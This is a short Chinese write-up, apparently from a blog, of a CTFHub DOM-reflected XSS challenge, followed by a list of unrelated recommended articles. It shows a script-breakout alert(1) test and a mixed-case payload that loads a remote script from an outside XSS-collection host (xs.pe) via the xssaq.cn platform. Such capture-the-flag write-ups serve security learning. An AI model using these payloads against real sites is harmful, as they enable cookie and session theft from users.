根据框里的内容 直接右键查看网页源代码 看到 了其闭合方式
然后去网页测试一下alert(1)反射
';</script><script>alert(1)</script>
看到 确实存在 去xssaq.cn
创建一个项目 把src粘过来 在第一个输入框中 再将返回回来的url 复制粘贴到第二个 输入框中
';</script><sCRiPt sRC=//xs.pe/Eoo></sCrIpT>
CTFHub技能树web——XSS——DOM反射
A 八方2024-08-06 21:41
相关推荐
C_心欲无痕13 分钟前
ts - tsconfig.json配置讲解清沫17 分钟前
Claude Skills:Agent 能力扩展的新范式yinuo1 小时前
前端跨页面通信终极指南:方案拆解、对比分析yinuo1 小时前
前端跨页面通讯终极指南⑨:IndexedDB 用法全解析xkxnq2 小时前
第二阶段:Vue 组件化开发(第 16天)烛阴2 小时前
拒绝配置地狱!5 分钟搭建 Three.js + Parcel 完美开发环境xkxnq2 小时前
第一阶段:Vue 基础入门(第 15天)anyup4 小时前
2026第一站:分享我在高德大赛现场学到的技术、产品与心得BBBBBAAAAAi4 小时前
Claude Code安装记录xiaolyuh1234 小时前
【XXL-JOB】 GLUE模式 底层实现原理